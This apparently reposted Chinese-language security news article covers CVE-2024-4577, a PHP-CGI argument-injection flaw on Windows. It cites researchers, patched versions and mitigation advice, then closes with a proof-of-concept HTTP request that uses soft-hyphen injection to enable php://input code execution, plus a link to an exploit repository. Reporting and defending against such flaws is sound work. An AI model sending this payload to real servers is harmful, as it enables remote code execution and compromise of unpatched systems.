圈小蛙

新的PHP漏洞CVE-2024-4577使Windows服务器面临远程代码执行风险

有关影响PHP的一个新严重安全漏洞的详细信息已经浮出水面,该漏洞可在某些情况下可被利用来实现远程代码执行。

该漏洞被追踪为CVE-2024-4577,被描述为一个CGI参数注入漏洞,影响安装在Windows操作系统上的所有PHP版本。

据DEVCORE安全研究人员称,该漏洞使得绕过针对另一个安全漏洞CVE-2012-1823设置的保护措施成为可能。

“在实施PHP时,团队没有注意到Windows操作系统内编码转换的最佳拟合(Best-Fit)功能,”安全研究员Orange Tsai说

“这一疏忽允许未经身份验证的攻击者通过特定字符序列绕过CVE-2012-1823的先前保护。通过参数注入攻击,可以在远程PHP服务器上执行任意代码。”

在2024年5月7日负责任地披露后,PHP在8.3.8、8.2.20和8.1.29版本中已提供了该漏洞的修复程序

DEVCORE警告说,当配置为使用繁体中文、简体中文或日语语言环境时,Windows上的所有XAMPP安装在默认情况下都存在该漏洞。

这家台湾公司还建议管理员完全放弃过时的PHP CGI,选择更安全的解决方案,例如Mod-PHP、FastCGI或PHP-FPM。

“这个漏洞非常简单,但这也是它有趣的地方,”Tsai说。“谁会想到,一个经过12年审查并被证明是安全的补丁,会因为一个小小的Windows功能而被绕过?”

Shadowserver Foundation在X上分享的一篇文章中表示,在公开披露后的24小时内,它已经检测到针对其蜜罐服务器的漏洞利用尝试。

watchTowr Labs表示,它能够设计出针对CVE-2024-4577的漏洞利用程序,并实现远程代码执行,因此用户必须尽快应用最新的补丁程序。

“这是一个非常严重的漏洞,漏洞利用非常简单,”安全研究员Aliz Hammond说

“那些在受影响的语言环境之一”中文(简体或繁体)或日语“下运行受影响配置的用户,请尽快更新补丁,因为由于漏洞利用复杂性低,该漏洞很有可能被大规模利用。”

Poc:

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: /
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

具体的Exp可以参考Github:https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main

Exit mobile version